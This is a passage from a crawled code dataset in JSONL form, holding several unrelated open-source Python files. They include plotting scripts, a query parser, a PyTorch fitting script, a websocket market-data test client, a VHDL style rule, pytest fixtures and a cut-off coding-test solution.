' in params:\n\t\t\t(dest, message) = params.split(' ', 1)\n\t\t\tlog(command, sender, dest = dest, params = message[1:], source = source)\n\t\telse:\n\t\t\tlog(command, sender, dest = params, source = source)\n\n\t\n","repo_name":"Basrandir/thelost","sub_path":"theLost.py","file_name":"theLost.py","file_ext":"py","file_size_in_byte":6016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20564263487","text":"import os.path as osp\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport re\n\nCKPT_PATH5 = \"/data/hyou37/yipin/program/dlrm/ckpt/terabyte/mlp/mlp_bot-13-512-256-64_top-512-512-256-1_baseline3.log\"\nCKPT_PATH4 = \"/data/hyou37/yipin/program/dlrm/ckpt/terabyte/interaction_transformer/mlp_bot-13-512-256-64_top-512-512-256-1_zeroAttn.log\"\nCKPT_PATH3 = \"/data/hyou37/yipin/program/dlrm/ckpt/terabyte/interaction_transformer/mlp_bot-13-512-256-64_top-512-512-256-1_noSparse.log\"\nCKPT_PATH2 = \"/data/hyou37/yipin/program/dlrm/ckpt/terabyte/interaction_transformer/mlp_bot-13-512-256-64_top-512-512-256-1_halfPrune.log\"\nCKPT_PATH1 = \"/data/hyou37/yipin/program/dlrm/ckpt/terabyte/interaction_transformer/mlp_bot-13-512-256-64_top-512-512-256-1_baseline2.log\"\n# lossMsg = np.empty(shape=[2,0])\n\n\ndef load_message(flieName):\n loss_pattern = re.compile(r\"loss (\\d+\\.\\d+)\")\n accuracy_pattern = re.compile(r\"AUC (\\d+\\.\\d+)\")\n\n count = 0\n with open(flieName, 'r') as f:\n fileMsg = f.read()\n loss_values = [float(match) for match in re.findall(loss_pattern, fileMsg)]\n accuracy_values = [float(match) for match in re.findall(accuracy_pattern, fileMsg)]\n \n return loss_values, accuracy_values\n\ndef draw_curve(loss_values, accuracy_values, outFilePath:str = \"./plot.png\"):\n # Create a figure with two y-axes\n fig, ax1 = plt.subplots()\n\n # Plot loss curve on the first y-axis\n loss_step = np.arange(512, (len(loss_values) + 1)*512, 512)\n ax1.plot(loss_step, loss_values, 'r-', label='Loss')\n ax1.set_xlabel('Iterations')\n ax1.set_ylabel('Loss')\n ax1.set_ylim(0.12,0.16)\n ax1.tick_params('y', colors='r')\n ax1.grid(True)\n\n # Create a second y-axis\n ax2 = ax1.twinx()\n\n # Plot accuracy curve on the second y-axis\n accuracy_step = np.arange(len(loss_values)/len(accuracy_values)*512, (len(loss_values) + 1)*512, (len(loss_values)/len(accuracy_values))*512)\n ax2.plot(accuracy_step, accuracy_values, 'b-', label='AUC')\n ax2.set_ylabel('AUC')\n ax2.tick_params('both', colors='b')\n\n # Add legend\n lines = [ax1.get_lines()[0], ax2.get_lines()[0]]\n ax1.legend(lines, [line.get_label() for line in lines], loc='lower right')\n\n # Save the plot as PDF\n plt.title(CKPT_PATH.split('/')[-1][:-4])\n plt.savefig(outFilePath)\n\n\ndef draw_singleY(data1, data2, data3, data4, data5, outFilePath:str = \"./plot.png\"):\n fig, ax1 = plt.subplots()\n\n # Plot loss curve on the first y-axis\n loss_step1 = np.arange(512, (len(data1) + 1)*512, 512)\n loss_step2 = np.arange(512, (len(data2) + 1)*512, 512)\n loss_step3 = np.arange(512, (len(data3) + 1)*512, 512)\n loss_step4 = np.arange(512, (len(data4) + 1)*512, 512)\n loss_step5 = np.arange(512, (len(data5) + 1)*512, 512)\n\n ax1.plot(loss_step1, data1, 'r-', label='attn>0.1')\n ax1.plot(loss_step2, data2, 'b-', label='attn>mean(abs(attn)))')\n ax1.plot(loss_step3, data3, 'y-', label='no sparse')\n ax1.plot(loss_step4, data4, 'm-', label='const attn')\n ax1.plot(loss_step5, data5, 'g-', label='dot')\n\n ax1.set_xlabel('Step')\n ax1.set_ylabel('Loss')\n # ax1.set_ylim(0.60,0.75)\n ax1.set_ylim(0.12,0.16)\n ax1.tick_params('y', colors='r')\n ax1.grid(True)\n # Add legend\n lines = [ax1.get_lines()[0], ax1.get_lines()[1],ax1.get_lines()[2],ax1.get_lines()[3],ax1.get_lines()[4]]\n ax1.legend(lines, [line.get_label() for line in lines], loc='lower right')\n\n # Save the plot as PDF\n # plt.title(CKPT_PATH.split('/')[-1][:-4])\n plt.savefig(outFilePath)\n\nloss_values1, AUC_values1 = load_message(CKPT_PATH1)\nloss_values2, AUC_values2 = load_message(CKPT_PATH2)\nloss_values3, AUC_values3 = load_message(CKPT_PATH3)\nloss_values4, AUC_values4 = load_message(CKPT_PATH4)\nloss_values5, AUC_values5 = load_message(CKPT_PATH5)\n# draw_curve(loss_values, accuracy_values)\n# draw_singleY(AUC_values1, AUC_values2, AUC_values3, AUC_values4, AUC_values5, \"./AUC.png\")\ndraw_singleY(loss_values1, loss_values2, loss_values3, loss_values4,loss_values5, \"./loss.png\")","repo_name":"coco-alen/dlrm","sub_path":"draw_lossAccy.py","file_name":"draw_lossAccy.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"38523712106","text":"import re\nimport ast\n\ndef get_new_key(prefix, substr, done):\n\t\n\tkey = \"_%s1_\" % (prefix)\n\tn = 1\n\twhile (key in done) or (key in substr):\n\t\tn += 1\n\t\tkey = \"_%s%d_\" % (prefix, n)\n\treturn key\n\ndef add_bracketed(clsname, descrname, prefix, substr, bracketed, lookup):\n\t\n\tif isinstance(clsname, str):\n\t\tclsname = clsname.strip(\"[]\")\n\t\n\tif (clsname, descrname) in lookup:\n\t\tkey = lookup[(clsname, descrname)]\n\telse:\n\t\tkey = get_new_key(prefix, substr, bracketed)\n\t\tbracketed[key] = (clsname, descrname)\n\t\tlookup[(clsname, descrname)] = key\n\t\n\treturn key\n\ndef str_to_key(substr):\n\t\n\tsubstr = tuple(substr.split(\".\"))\n\tif len(substr) == 1:\n\t\treturn (substr[0], None)\n\treturn substr\n\ndef remove_quoted(substr):\n\t# returns substr, quoted = {key: quoted substr, ...}\n\t\n\tquoted = {}\n\twhile True:\n\t\tfound = False\n\t\tfor m in re.finditer(r\"(['\\\"])(.*?)\\1\", substr):\n\t\t\ti, j = m.start(0), m.end(0)\n\t\t\tkey = get_new_key(\"QU\", substr, quoted)\n\t\t\tquoted[key] = substr[i:j]\n\t\t\tsubstr = substr[:i] + \" %s \" % (key) + substr[j:]\n\t\t\tfound = True\n\t\t\tbreak\n\t\tif not found:\n\t\t\tbreak\n\t\n\treturn substr, quoted\n\ndef remove_bracketed_selects(substr, classes, descriptors):\n\t# returns substr, bracketed = {key: (class, descriptor), ...}\n\t\n\tdef process_found(substr_cleaned, i, j, names):\n\t\t\n\t\tif substr_cleaned[:i].endswith(\"*.\"):\n\t\t\tnames.append([i-2, i-1, \"*\", False])\n\t\t\tsubstr_cleaned = substr_cleaned[:i-2] + \" \" + substr_cleaned[i-1:]\n\t\tif substr_cleaned[j:].startswith(\".*\"):\n\t\t\tnames.append([j+1, j+2, \"*\", False])\n\t\t\tsubstr_cleaned = substr_cleaned[:j+1] + \" \" + substr_cleaned[j+2:]\n\t\t\n\t\treturn substr_cleaned\n\t\n\tbracketed = {}\n\tdone = {}\n\t\n\tsubstr_cleaned = substr\n\tnames = [] # [[i, j, text, is_bracketed], ...]\n\t\n\tfor m in re.finditer(r\"OBJ+\\(.*?\\)\", substr_cleaned):\n\t\ti, j = m.start(0), m.end(0)\n\t\tids = [id_.strip() for id_ in substr_cleaned[i+4:j-1].split(\",\")]\n\t\tif not False in [id_.isdigit() for id_ in ids]:\n\t\t\tnames.append([i, j, tuple([int(id_) for id_ in ids]), True])\n\t\t\tsubstr_cleaned = substr_cleaned[:i] + (j-i)*\" \" + substr_cleaned[j:]\n\t\t\tsubstr_cleaned = process_found(substr_cleaned, i, j, names)\n\t\n\tfor clsname in sorted(list(classes), key = lambda name: len(name))[::-1]:\n\t\tfor m in re.finditer(r\"(\\A|[^a-zA-Z0-9_])(%s)([^a-zA-Z0-9_]|\\Z)\" % (clsname), substr_cleaned):\n\t\t\ti, j = m.start(0), m.end(0)\n\t\t\tfound = False\n\t\t\tif (substr_cleaned[i] == \"[\") and (substr_cleaned[j-1] == \"]\"):\n\t\t\t\tnames.append([i, j, substr_cleaned[i:j], True])\n\t\t\t\tsubstr_cleaned = substr_cleaned[:i] + (j-i)*\" \" + substr_cleaned[j:]\n\t\t\t\tfound = True\n\t\t\telse:\n\t\t\t\tif substr_cleaned[i:].startswith(clsname):\n\t\t\t\t\ti -= 1\n\t\t\t\tif substr_cleaned[:j].endswith(clsname):\n\t\t\t\t\tj += 1\n\t\t\t\tif substr_cleaned[i+1:j-1].isidentifier():\n\t\t\t\t\ti += 1\n\t\t\t\t\tj -= 1\n\t\t\t\t\tnames.append([i, j, substr_cleaned[i:j], False])\n\t\t\t\t\tsubstr_cleaned = substr_cleaned[:i] + len(substr_cleaned[i:j])*\" \" + substr_cleaned[j:]\n\t\t\t\t\tfound = True\n\t\t\tif found:\n\t\t\t\tsubstr_cleaned = process_found(substr_cleaned, i, j, names)\n\t\n\tfragments = [] # [[text, is_class, is_bracketed], ...]\n\tj_last = 0\n\tfor i, j, name, is_bracketed in sorted(names, key = lambda row: row[0]):\n\t\tif i > j_last:\n\t\t\tfragments.append([substr_cleaned[j_last:i], False, False])\n\t\tfragments.append([name, True, is_bracketed])\n\t\tj_last = j\n\tif j_last < len(substr_cleaned):\n\t\tfragments.append([substr_cleaned[j_last:], False, False])\n\t\n\tcheckstr = \"\"\n\tfor text, is_class, _ in fragments:\n\t\tif is_class:\n\t\t\tcheckstr += \"C\"\n\t\telif text == \".\":\n\t\t\tcheckstr += \".\"\n\t\telse:\n\t\t\tcheckstr += \"X\"\n\t\n\tdescriptors = descriptors.union({\"*\"})\n\t\n\tcollect = []\n\twhile fragments:\n\t\tif checkstr.startswith(\"C.C.C\"):\n\t\t\t# not a SELECT (probably a relation)\n\t\t\tfor i in range(5):\n\t\t\t\ttext, _, _ = fragments.pop(0)\n\t\t\t\tcollect.append(text)\n\t\t\tcheckstr = checkstr[5:]\n\t\telif checkstr.startswith(\"C.C\"):\n\t\t\tclsname, descrname = fragments[0][0], fragments[2][0].strip(\"[]\")\n\t\t\tclsname = clsname.strip(\"[]\") if isinstance(clsname, str) else clsname\n\t\t\tif (descrname in descriptors) and (fragments[0][2] or fragments[2][2]):\n\t\t\t\t# second class is a descriptor and one of them is bracketed\n\t\t\t\tkey = add_bracketed(clsname, descrname, \"VAR\", substr, bracketed, done)\n\t\t\t\tcollect += \" %s \" % (key)\n\t\t\telse:\n\t\t\t\tcollect += [text for text, _, _ in fragments[:3]]\n\t\t\tfragments = fragments[3:]\n\t\t\tcheckstr = checkstr[3:]\n\t\telif checkstr.startswith(\"CX\") and fragments[1][0].strip().startswith(\".\"):\n\t\t\tcollect += [text for text, _, _ in fragments[:3]]\n\t\t\tfragments = fragments[3:]\n\t\t\tcheckstr = checkstr[3:]\n\t\telif checkstr.startswith(\"C\") and fragments[0][2]:\n\t\t\t# bracketed class without a descriptor\n\t\t\tkey = add_bracketed(fragments[0][0], None, \"VAR\", substr, bracketed, done)\n\t\t\tcollect += \" %s \" % (key)\n\t\t\tfragments = fragments[1:]\n\t\t\tcheckstr = checkstr[1:]\n\t\telse:\n\t\t\ttext, _, _ = fragments.pop(0)\n\t\t\tcollect.append(text)\n\t\t\tcheckstr = checkstr[1:]\n\tcollect = [\"OBJ(%s)\" % (\",\".join([str(id_) for id_ in item])) if isinstance(item, tuple) else item for item in collect]\n\tsubstr = \"\".join(collect)\n\t\n\treturn substr, bracketed\n\ndef remove_classless(substr, classes):\n\t\n\tclassless = set()\n\twhile True:\n\t\tfound = False\n\t\tfor m in re.finditer(\"\\!\\*\\.\", substr):\n\t\t\ti, j = m.start(0), m.end(0)\n\t\t\tkey = get_new_key(\"CL\", substr, classless.union(classes))\n\t\t\tclassless.add(key)\n\t\t\tsubstr = substr[:i] + key + substr[j-1:]\n\t\t\tfound = True\n\t\t\tbreak\n\t\tif not found:\n\t\t\tbreak\n\t\n\treturn substr, classless\n\ndef remove_bracketed_all(substr):\n\t# returns substr, bracketed = {key: bracketed substr, ...}\n\t\n\tbracketed = {}\n\twhile True:\n\t\tfound = False\n\t\tfor m in re.finditer(r\"OBJ+\\(.*?\\)\", substr):\n\t\t\ti, j = m.start(0), m.end(0)\n\t\t\tids = [id_.strip() for id_ in substr[i+4:j-1].split(\",\")]\n\t\t\tif not False in [id_.isdigit() for id_ in ids]:\n\t\t\t\tkey = get_new_key(\"BA\", substr, bracketed)\n\t\t\t\tbracketed[key] = tuple([int(id_) for id_ in ids])\n\t\t\t\tsubstr = substr[:i] + key + substr[j:]\n\t\t\t\tfound = True\n\t\t\t\tbreak\n\t\tfor m in re.finditer(r\"\\[.*?\\]\", substr):\n\t\t\ti, j = m.start(0), m.end(0)\n\t\t\tkey = get_new_key(\"BA\", substr, bracketed)\n\t\t\tbracketed[key] = substr[i:j]\n\t\t\tsubstr = substr[:i] + key + substr[j:]\n\t\t\tfound = True\n\t\t\tbreak\n\t\tif not found:\n\t\t\tbreak\n\t\n\treturn substr, bracketed\n\ndef replace_bracketed(substr, bracketed):\n\t\n\tfor key in bracketed:\n\t\tdata = bracketed[key]\n\t\tif isinstance(data, tuple):\n\t\t\tdata = \"OBJ(%s)\" % (\",\".join([str(obj_id) for obj_id in data]))\n\t\tsubstr = substr.replace(key, data)\n\treturn substr\n\nclass SelectsToVarsTransformer1(ast.NodeTransformer):\n\t\n\tdef __init__(self, substr, classes, descriptors, bracketed_selects):\n\t\t# classes = {class_name, ...}\n\t\t# descriptors = {descriptor_name, ...}\n\t\t# bracketed_selects = {key: (class, descriptor), ...}\n\t\t\n\t\tast.NodeTransformer.__init__(self)\n\t\t\n\t\tself._done = {} # {(class_name, descriptor_name): variable_name, ...}\n\t\tself.selects = bracketed_selects # {key: (class, descriptor), ...}\n\t\t\n\t\tself._substr = substr\n\t\tself._classes = classes\n\t\tself._descriptors = descriptors\n\t\t\n\t\tfor name in self.selects:\n\t\t\tkey = self.selects[name]\n\t\t\tself._done[key] = name\n\t\n\tdef visit_Attribute(self, node):\n\t\t\n\t\tself.generic_visit(node)\n\t\t\n\t\tif (type(node.value) is ast.Name) and \\\n\t\t\t(node.value.id not in __builtins__) and \\\n\t\t\t(node.value.id in self._classes) and \\\n\t\t\t(node.attr not in __builtins__) and \\\n\t\t\t(node.attr in self._descriptors):\n\t\t\t\tname = add_bracketed(node.value.id, node.attr, \"VAR\", self._substr, self.selects, self._done)\n\t\t\t\treturn ast.Name(id = name, ctx = node.ctx)\n\t\t\n\t\treturn node\n\nclass SelectsToVarsTransformer2(SelectsToVarsTransformer1):\n\t\n\tdef visit_Name(self, node):\n\t\t\n\t\tname = node.id\n\t\tif (name not in __builtins__) and (name in self._classes):\n\t\t\tname = add_bracketed(name, None, \"VAR\", self._substr, self.selects, self._done)\n\t\t\n\t\treturn ast.Name(id = name, ctx = node.ctx)\n\t\n\tdef visit_Attribute(self, node):\n\t\t\n\t\treturn node\n\ndef extract_expr_vars(substr, classes, descriptors, bracketed_selects):\n\t# classes = {name, ...}\n\t# descriptors = {name, ...}\n\t# bracketed_selects = {key: (class, descriptor), ...}\n\t\n\tsubstr, classless = remove_classless(substr, classes)\n\t\n\ttree = ast.parse(substr)\n\t# find and replace Class.Descriptor occurences in substr\n\ttransformer = SelectsToVarsTransformer1(substr, classes.union(classless), descriptors, bracketed_selects)\n\ttree = transformer.visit(tree)\n\t# find and replace Class occurences in substr\n\ttransformer = SelectsToVarsTransformer2(substr, classes.union(classless), descriptors, bracketed_selects)\n\ttree = transformer.visit(tree)\n\texpr = ast.unparse(tree)\n\tvars = transformer.selects.copy()\n\t\n\tfor name in vars:\n\t\tif vars[name][0] in classless:\n\t\t\tcls, descr = vars[name]\n\t\t\tvars[name] = (\"!*\", descr)\n\t\n\treturn expr, vars\n\n\nclass Parse(object):\n\t\n\tKEYWORDS = [\"SELECT\", \"COUNT\", \"SUM\", \"AS\", \"RELATED\", \"WHERE\", \"GROUP BY\"]\n\n\tdef __init__(self, querystr, classes, descriptors):\n\t\t# classes = {name, ...}\n\t\t# descriptors = {name, ...}\n\t\t# querystr = \"SELECT [select1], [select2], COUNT([select1]) AS [alias], SUM([select1]) AS [alias], ... RELATED [relation1], [relation2], ... WHERE [conditions expression] GROUP BY [select1], [select2], ...\"\n\t\t#\tselect = Class or Class.Descriptor\n\t\t#\trelation = Class1.Relation.Class2\n\t\t#\tconditions = python expression; e.g. Class.Descriptor > 3 or Class is not None\n\t\t#\tuse [name with spaces] to escape class, descriptor, relation or alias names containing spaces or KEYWORDS\n\t\t\n\t\tself.querystr = querystr\n\t\tself.classes = classes\n\t\tself.descriptors = descriptors\n\t\t\n\t\tself.columns = [] # [(class_name, descriptor_name), (None, alias), ...]\n\t\tself.selects = [] # [(class_name, descriptor_name), ...]\n\t\tself.group_by = [] # [(class_name, descriptor_name), ...]\n\t\tself.counts = [] # [(alias, class_name, descriptor_name), ...]\n\t\tself.sums = [] # [(alias, class_name, descriptor_name), ...]\n\t\tself.relations = [] # [(class1, relation, class2), ...]\n\t\tself.where_expr = \"\"\n\t\tself.where_vars = {} # {name: (class, descriptor), ...}\n\t\tself.classes_used = [] # [name, ...]\n\t\t\n\t\tquerystr, quoted = remove_quoted(self.querystr)\n\t\tquerystr, bracketed_selects = remove_bracketed_selects(querystr, self.classes, self.descriptors)\n\t\tquerystr, bracketed_other = remove_bracketed_all(querystr)\n\t\t\n\t\tcollect = []\n\t\tfor keyword in self.KEYWORDS:\n\t\t\tfor m in re.finditer(r\"(?i)\\b%s\\b\" % (keyword), querystr):\n\t\t\t\ti, j = m.start(0), m.end(0)\n\t\t\t\tcollect.append((i, j, keyword))\n\t\tcollect = sorted(collect)\n\t\tcollect2 = []\n\t\tfor idx in range(len(collect)):\n\t\t\ti, j, keyword = collect[idx]\n\t\t\tif idx < len(collect) - 1:\n\t\t\t\tk = collect[idx + 1][0]\n\t\t\telse:\n\t\t\t\tk = len(querystr)\n\t\t\tcollect2.append((keyword, j, k))\n\t\tcollect = collect2\n\t\tcollect2 = None\n\t\t\n\t\twhile collect:\n\t\t\tkeyword, i, j = collect.pop(0)\n\t\t\tsubstr = querystr[i:j].strip().strip(\",\").strip()\n\t\t\t\n\t\t\tif keyword in [\"SELECT\", \"GROUP BY\"]:\n\t\t\t\tfor name in substr.split(\",\"):\n\t\t\t\t\tname = name.strip()\n\t\t\t\t\tif name in bracketed_selects:\n\t\t\t\t\t\titem = bracketed_selects[name]\n\t\t\t\t\telse:\n\t\t\t\t\t\titem = str_to_key(name)\n\t\t\t\t\tif keyword == \"SELECT\":\n\t\t\t\t\t\tself.selects.append(item)\n\t\t\t\t\t\tself.columns.append(item)\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.group_by.append(item)\n\t\t\t\n\t\t\telif keyword in [\"COUNT\", \"SUM\"]:\n\t\t\t\tname = substr.strip(\"()\").strip()\n\t\t\t\tif name in bracketed_selects:\n\t\t\t\t\tclass_name, descriptor_name = bracketed_selects[name]\n\t\t\t\telse:\n\t\t\t\t\tclass_name, descriptor_name = str_to_key(name)\n\t\t\t\tif collect and (collect[0][0] == \"AS\"):\n\t\t\t\t\t_, i, j = collect.pop(0)\n\t\t\t\t\talias = querystr[i:j]\n\t\t\t\t\talias = replace_bracketed(alias, bracketed_other)\n\t\t\t\t\talias = alias.strip().strip(\",\").strip()\n\t\t\t\t\tclass_name, descriptor_name, alias = [(item.strip(\"[]\") if item else None) for item in [class_name, descriptor_name, alias]]\n\t\t\t\t\tif keyword == \"COUNT\":\n\t\t\t\t\t\tself.counts.append((alias, class_name, descriptor_name))\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.sums.append((alias, class_name, descriptor_name))\n\t\t\t\t\tself.columns.append((None, alias))\n\t\t\t\n\t\t\telif keyword == \"RELATED\":\n\t\t\t\tfor chain in substr.split(\",\"):\n\t\t\t\t\tchain = str_to_key(chain.strip())\n\t\t\t\t\tif len(chain) == 3:\n\t\t\t\t\t\trelation = []\n\t\t\t\t\t\tfor item in chain:\n\t\t\t\t\t\t\tif item in bracketed_other:\n\t\t\t\t\t\t\t\trelation.append(bracketed_other[item])\n\t\t\t\t\t\t\t\tif isinstance(relation[-1], str):\n\t\t\t\t\t\t\t\t\trelation[-1] = relation[-1].strip(\"[]\")\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\trelation.append(item.strip(\"[]\"))\n\t\t\t\t\t\tself.relations.append(tuple(relation))\n\t\t\t\n\t\t\telif keyword == \"WHERE\":\n\t\t\t\tsubstr = replace_bracketed(substr, bracketed_other)\n\t\t\t\tself.where_expr, self.where_vars = extract_expr_vars(substr, self.classes, self.descriptors, bracketed_selects)\n\t\t\n\t\tfor key in quoted:\n\t\t\tself.where_expr = self.where_expr.replace(key, quoted[key])\n\t\t\n\t\tfor class_name, _ in self.selects + self.group_by:\n\t\t\tif (class_name is not None) and (class_name not in self.classes_used):\n\t\t\t\tself.classes_used.append(class_name)\n\t\tfor _, class_name, _ in self.counts + self.sums:\n\t\t\tif (class_name is not None) and (class_name not in self.classes_used):\n\t\t\t\tself.classes_used.append(class_name)\n\t\tfor class_name1, _, class_name2 in self.relations:\n\t\t\tfor class_name in [class_name1, class_name2]:\n\t\t\t\tif (class_name is not None) and (class_name not in self.classes_used):\n\t\t\t\t\tself.classes_used.append(class_name)\n\t\tfor name in self.where_vars:\n\t\t\tclass_name = self.where_vars[name][0]\n\t\t\tif class_name not in self.classes_used:\n\t\t\t\tself.classes_used.append(class_name)\n\t\t\t\n","repo_name":"demjanp/deposit","sub_path":"src/deposit/query/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":13297,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"32404664325","text":"# -*- coding: utf-8 -*-\nimport torch\n\n\n\n#params to learn\n# dmg_nor\n# dmg_exp\n# dmg_con\n# small_armor\n# small_hit\n# medium_armor\n# medium_hit\n# large_armor\n# large_hit\n\n\nx = torch.tensor(1.0)\ndmg_nor = torch.tensor([10.0], requires_grad=True)\ndmg_exp = torch.tensor([10.0], requires_grad=True)\ndmg_con = torch.tensor([10.0], requires_grad=True)\nsmall_armor = torch.tensor([1.0], requires_grad=True)\nsmall_hit = torch.tensor([200.0], requires_grad=True)\nmedium_armor = torch.tensor([1.0], requires_grad=True)\nmedium_hit = torch.tensor([200.0], requires_grad=True)\nlarge_armor = torch.tensor([1.0], requires_grad=True)\nlarge_hit = torch.tensor([200.0], requires_grad=True)\ny = torch.tensor(0.03) * 100\n\nlearning_rate = 1\nfor t in range(1000):\n # Forward pass: Compute predicted y by passing x to the model\n y1 = ((x*dmg_nor) - small_armor) / small_hit\n y2 = ((x*dmg_nor) - medium_armor) / medium_hit\n y3 = ((x*dmg_nor) - large_armor) / large_hit\n y4 = ((x*dmg_con) - small_armor) / small_hit\n y5 = ((x*dmg_con) - medium_armor) * 0.5 / small_hit\n y6 = ((x*dmg_con) - large_armor) * 0.25 / small_hit\n y7 = ((x*dmg_exp) - small_armor) * 0.5 / small_hit\n y8 = ((x*dmg_exp) - medium_armor) * 0.75 / small_hit\n y9 = ((x*dmg_exp) - large_armor) / small_hit\n y_pred = torch.cat((y1,y2,y3,y4,y5,y6,y7,y8,y9)) * 100\n \n #print(y_pred)\n # Compute and print loss\n loss = (y_pred-y).pow(2).mul(torch.tensor([9.,6.,3.,6.,4.,2.,3.,2.,1.])).sum()\n print(t, loss.item())\n\n loss.backward()\n with torch.no_grad():\n dmg_nor -= learning_rate * dmg_nor.grad\n dmg_exp -= learning_rate * dmg_exp.grad\n dmg_con -= learning_rate * dmg_con.grad\n small_armor -= learning_rate * small_armor.grad\n small_hit -= learning_rate * small_hit.grad\n medium_armor -= learning_rate * medium_armor.grad\n medium_hit -= learning_rate * medium_hit.grad\n large_armor -= learning_rate * large_armor.grad\n large_hit -= learning_rate * large_hit.grad\n small_armor[0] = max(small_armor[0],0.0)\n medium_armor[0] = max(medium_armor[0],0.0)\n large_armor[0] = max(large_armor[0],0.0)\n small_armor[0] = min(small_armor[0],10.0)\n medium_armor[0] = min(medium_armor[0],10.0)\n large_armor[0] = min(large_armor[0],10.0)\n small_hit[0] = min(small_hit[0],1000.0)\n medium_hit[0] = min(medium_hit[0],1000.0)\n large_hit[0] = min(large_hit[0],1000.0)\n\n # Manually zero the gradients after updating weights\n dmg_nor.grad.zero_()\n dmg_exp.grad.zero_()\n dmg_con.grad.zero_()\n small_armor.grad.zero_()\n small_hit.grad.zero_()\n medium_armor.grad.zero_()\n medium_hit.grad.zero_()\n large_armor.grad.zero_()\n large_hit.grad.zero_()\nprint(dmg_nor.item(), \n dmg_con.item(),\n dmg_exp.item(),\n small_armor.item(),\n small_hit.item(),\n medium_armor.item(),\n medium_hit.item(),\n large_armor.item(),\n large_hit.item()\n )\n","repo_name":"parkjunsoo91/number-communication","sub_path":"dealing.py","file_name":"dealing.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5320506923","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#用于访问OKCOIN 期货REST API\n\nimport websocket\nimport socket\nimport sys\n\ntry:\n import thread\nexcept ImportError:\n import _thread as thread\nimport time\nimport json\n\nclass WsTool(object):\n \"\"\"docstring for WsTool\"\"\"\n def __init__(self, arg):\n super(WsTool, self).__init__()\n self.arg = arg\n def on_message(ws, message):\n print('-----getMsg------')\n print(message)\n print(type(message))\n # msg = str(message)\n # dtool.onMessage(message)\n\n def on_error(ws, error):\n print('-----eoor------')\n print(error)\n\n def on_close(ws):\n print(\"### closed ###\")\n\n def on_open(ws):\n print('is Open')\n # def run(*args):\n # # for i in range(3):\n # # time.sleep(1)\n # # ws.send(\"Hello %d\" % i)\n # # time.sleep(1)\n # # ws.close()\n # # print(\"thread terminating...\")\n # # msg = {\"op\": \"subscribe\", \"args\": [\"tradeBin1m:XBTUSD\",\"orderBook10:XBTUSD\"]}\n # # msg = {\"op\": \"subscribe\", \"args\": [\"tradeBin1m:XBTUSD\",\"orderBookL2:XBTUSD\"]}\n # msg = {\"op\": \"subscribe\", \"args\": [\"tradeBin1m:XBTUSD\"]}\n # # msg = {\"op\": \"subscribe\", \"args\": [\"quoteBin1m:XBTUSD\"]}#instrument\n # # msg = {\"op\": \"subscribe\", \"args\": [\"instrument:XBTUSD\"]}#instrument\n # # msg = \"help\"\n # jstr = json.dumps(msg)\n # ws.send(jstr)\n # thread.start_new_thread(run, ())\n\ndef test():\n # import datetime\n\n # dat = datetime.datetime(2000,1,1,8,0)\n # print(dat)\n for i in [12.12300, 12.00, 200.12000, 200.0]:\n d = '{:g}'.format(i)\n print(type(d))\n print(float(d))\n print('{:g}'.format(i))\n\n\ndef main():\n websocket.enableTrace(True)\n ws = websocket.WebSocketApp(\"wss://real.okex.com:10440/websocket/okexapi\",\n on_message = on_message,\n on_error = on_error,\n on_close = on_close)\n ws.on_open = on_open\n ws.run_forever()\n\nif __name__ == \"__main__\":\n test()\n\n \n","repo_name":"fengmm521/okex_robot_ubuntuserver","sub_path":"market_XBTU18_okex/wstest.py","file_name":"wstest.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"22945927553","text":"\nfrom vsg import token\n\nfrom vsg.rules import token_prefix\n\nlTokens = []\nlTokens.append(token.component_instantiation_statement.instantiation_label)\n\n\nclass rule_601(token_prefix):\n '''\n This rule checks for valid prefixes on instantiation labels.\n The default prefix is *inst_*.\n\n |configuring_prefix_and_suffix_rules_link|\n\n **Violation**\n\n .. code-block:: vhdl\n\n fifo_32x2k : FIFO\n\n **Fix**\n\n .. code-block:: vhdl\n\n inst_fifo_32x2k : FIFO\n '''\n\n def __init__(self):\n token_prefix.__init__(self, 'instantiation', '601', lTokens)\n self.prefixes = ['inst_']\n self.solution = 'instantiation label'\n","repo_name":"jeremiah-c-leary/vhdl-style-guide","sub_path":"vsg/rules/instantiation/rule_601.py","file_name":"rule_601.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"61"} +{"seq_id":"1543254652","text":"from calendar import weekday\nfrom fileinput import filename\nimport pytest\nimport os\n\nweekday1 = ['Monday','Tuesday']\nweekday2 = ['Wednesday','Thursday']\nfilename = 'fixture_test.txt'\n@pytest.fixture()\ndef get_list():\n\n weekday1.append('Friday')\n yield weekday1\n\n print('remove the inserted element')\n weekday1.pop()\n\n\ndef test_list(get_list):\n weekday2.extend(weekday1)\n\n assert weekday2 == ['Wednesday','Thursday','Monday','Tuesday','Friday']\n\n\n# create a file \n@pytest.fixture()\ndef setup():\n\n s = open(filename ,'w')\n s.write('testing')\n s.close()\n f = open(filename,'r+')\n yield f\n f.close()\n os.remove(filename)\n\n\ndef test_file(setup):\n\n assert setup.readline() == 'testing'","repo_name":"amog4/pytest-testing-automation","sub_path":"pytest_fixture_close.py","file_name":"pytest_fixture_close.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13873768049","text":"\ndef rotate(arr):\n ret = []\n for i in range(len(arr)):\n temp = []\n for j in range(len(arr)-1, -1, -1):\n temp.append(arr[j][i])\n ret.append(temp)\n\n return ret\n\n# def show(arr):\n# for i in arr:\n# print(i)\n# print()\n\n\ndef check(n, m, px, py, key, board):\n ret = True\n # 추가하기\n for i in range(m):\n for j in range(m):\n board[px + i][py + j] += key[i][j]\n\n # 